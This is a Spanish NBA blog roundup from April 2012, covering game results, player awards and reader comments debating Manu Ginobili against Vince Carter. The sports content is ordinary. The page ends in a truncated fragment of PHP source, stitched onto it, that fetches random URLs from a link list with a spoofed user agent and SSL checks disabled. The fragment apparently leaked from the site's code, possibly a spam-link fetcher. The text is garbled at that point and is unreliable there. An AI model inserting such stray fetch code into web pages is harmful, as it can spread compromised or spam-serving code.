La Crónica: cuando el objetivo es Anthony Davis

04 de April de 2012 por Hynreck

Con la resaca de la final universitaria todavía reciente, nadie parece que vaya a tener más papeletas para elegir a Anthony Davis que Michael Jordan. De hecho, sus Bobcats siguen a ritmo de record, sus 7 victorias en 51 partidos no dan una idea del nivel de un equipo que difícilmente competiría en la ACB. Anoche volvieron a perder ante los Raptorsdecalderón (se llaman así, todo junto, aunque nuestro Calde anote un solo punto), por 92 a 87.

kobe buzzMientras tanto, en Miami se vivía un bonito partido entre Heat y Sixers (93-99). Sin Wade, LeBron destrozó una y otra vez el aro contrario, Holiday y Brand no tuvieron su día y sólo Turner mantuvo a los Sixers en el choque. Los Heat se siguen acercando a los Bulls en la lucha por el primer puesto en la conferencia Este.

Tras lo ocurrido en Los Ángeles regalaremos los oídos de los Kobistas elogiando un nuevo partido ganado gracias a dos tiros anotados por Bryant en el último minuto, incluyendo un triple a falta de 10 segundos con su equipo 1 arriba. Si lo hubiese lanzado… qué se yo… un Ricky Davis de la vida, después de rebotar hasta seis veces en el aro, el balón se habría salido, me juego la paga del mes, pero es Bryant, y Bryant tiene ese “algo”… Final NJN 87-LAL 91. A lo tonto los Lakers se afianzan en la tercera posición del Oeste.

Los que siguen a lo suyo son los San Antonio Spurs. Cómoda victoria en Cleveland (125-90) dando mucho descanso a Duncan, Parker y Ginobili para el octavo partido seguido ganando. Siguen dando mucho miedo.

Memphis también sigue a lo suyo. Aunque ganar hoy por hoy a los chicos de la Bahía no tiene demasiado mérito. No estuvo mal Marc con 12 puntos 4 rebotes y 6 asistencias, y por GSW sólo cabe destacar a David Lee. 94-98 para los Grizzlies y la sensación de que están recuperando para la causa a O.J. Mayo como factor X.

Los sorprendentes Pacers siguen terceros en el Este y esta madrugada necesitaron un parcial de 40-17 en el último cuarto para remontar en casa a los Knicks (104-112) pese a la resistencia ofrecida por Carmelo Anthony (39 puntos y 10 rebotes). Danny Granger fue el mejor de los suyos con 27 puntos y 7 rebotes.

En los otros dos encuentros de la noche Greg Monroe aprovechó la baja de Howard, aunque bien cubierta por Big Baby Davis, para dar la victoria a Detroit por 95-102 y los Suns derrotaron a los Kings (109-100) pese a un colosal DeMarcus Cousins, que esta vez llegó hasta los 41 puntos y 12 rebotes.

lebron sixers

PREMIOS

MVP: el jugador que más ha contribuído la victoria de su equipo es todo un clásico en esta sección, LeBron James, autor anoche de 41 puntos 6 rebotes y 4 asistencias. Algo más lejos se quedarían jugadores como Bryant (27-7-3), Bargnani (30 puntos) o Greg Monroe (22-11-3).

Rookie: Isaiah Tomas sigue sorprendiéndonos. 25-7-3 para él. Los clásicos Kemba Walker, Kyrie Irving o Brandon Knight estuvieron más discretos. Entre los no habituales en esta sección destacamos a Jeremy Tyler con 9 puntos y 11 rebotes.

Decepción: el puntito de Calderón hay que destacarlo aunque se ve redimido en parte por sus 11 asistencias. Jrue Holiday tampoco tuvo su día, así como decepcionaron Elton Brand y Tyreke Evans, con 8 puntitos para cada uno de los tres. El premio en cambio se lo lleva un chico del que realmente no esperábamos nada, pero un 0 de 8 en tiros y 6 rebotes en 21 minutos de un 7 pies como Petro merecen un reconocimiento ¿no? El francés incluso firmó un air-ball en un tiro de no más de 4 metros.

Sorpresa: quizá no sea la última vez que le veamos por aquí. B.J. Mullens ve minutos y responde con números. 20 puntos y 14 rebotes. Resaltamos también a Patrick Mills, quien a los pocos días de enrolarse en los Spurs anotó 20 puntos.

Esfuerzo en vano: tortas hoy por llevarse este cotizado premio de TJNBA. Evan Turner lo codiciaba con 26 puntos y 8 rebotes, pero se veía superado por Carmelo y sus 39-10. Finalmente, Cousins se lo arrebataría a ambos con sus 41 puntos y 12 rebotes.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

54 comentarios a esta entrada

  1. German dice:
    #1

    Sancho88MagicyJokinJuanfe:
    melo, frénate con Manu, en serio, no la cagues. Llevabas un buen nivel de mensajes, pero comparar a Carter con Manu te está quitando toda la credibilidad. Manu Ginobili ha sido, probablemente, el mejor escolta de la historia no nacido en Estados Unidos, y me como deliberadamente a Drazen. Tiene unos juegos olímpicos en su poder, otra medalla de bronce olímpica, un campeonato del mundo, un subcampeonato del mundo… y Carter no. Y 4 anillos, y cuando era físicamente joven, te puedo asegurar que también la sabía hundir, penetrar, y todo al mismo nivel que Carter. No tan espectacular, pero sí tenía los recursos. Físicamente no te quedes con el jugador que es ahora, porque me da la sensación de que no has vivido los mejores años de Manu Ginobili y lo estás infravalorando. Nunca ha promediado unas estadísticas ‘salvajes’, pero te puedo asegurar que sin él no habrían sido lo que son ahora mismo los Spurs, en defensa mil veces mejor que Carter, y te peudo asegurar que sí ha tirado ofensivamente de su equipo… Spurs son un equipo que pasará a la historia por firmar una década impresionante, cuando nunca habían ganado nada, de la mano de Duncan, Manu y Parker. Solo te pido un poco de respeto hacia su figura, nada más.

    +1

    Humildemente, creo que el error de Melo15 es comparar todo en base a estadisticas y como bien han dicho muchas veces varios integrantes del foro, las estadisticas no lo son todo.
    El caso de Dirk y Griffin es un ejemplo claro de esto

      Citar

  2. melo15 dice:
    #2

    Bueno, ahora resultara que Carter es una mierda.

      Citar

  3. Heineken dice:
    #3

    melo15:
    Bueno, ahora resultara que Carter es una mierda.

    Tampoco es eso, simplemente estamos opinando que Ginobili ha sido/es mejor jugador que Carter.
    Carter fue todo un show verlo hasta que empezaron sus lesiones en los cuadriceps y demás, el mismo dijo que tuvo que empezar a ser menos “half men-half amazing” y mejorar en el tiro y otros fundamentos para poder seguir aportando, pero Ginobili era el “rey” en Europa cuando decidió irse a la NBA.
    Carter metía más puntos, si, pero cuando los Spurs necesitaban que Manudo se fuese a los 25 puntos, el lo hacía y lo hace con facilidad, ademas de dejárselo todo siempre en defensa, cosa que Vince Carter… digamos que nunca ha sido su fuerte la defensa.
    Además luego esta el compromiso y la profesionalidad, pregúntale sobre eso a los Toronto Raptors, a ver que opinan de la profesionalidad de Vince.

    Y te repito, yo me enganche a la NBA por el, tengo 2 camisetas de Vince y me encanta, pero es mejor jugador de baloncesto que Ginobili? Mi opinión es que no. Más espectacular si.

      Citar

  4. MagicJohnson32 dice:
    #4

    Juas juas, Sancho, me mola tu nuevo nick. Ahora, a ver cuál de ellos elige nba para referirse a ti xDD

    Melo, nadie dice que Carter sea una mierda.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>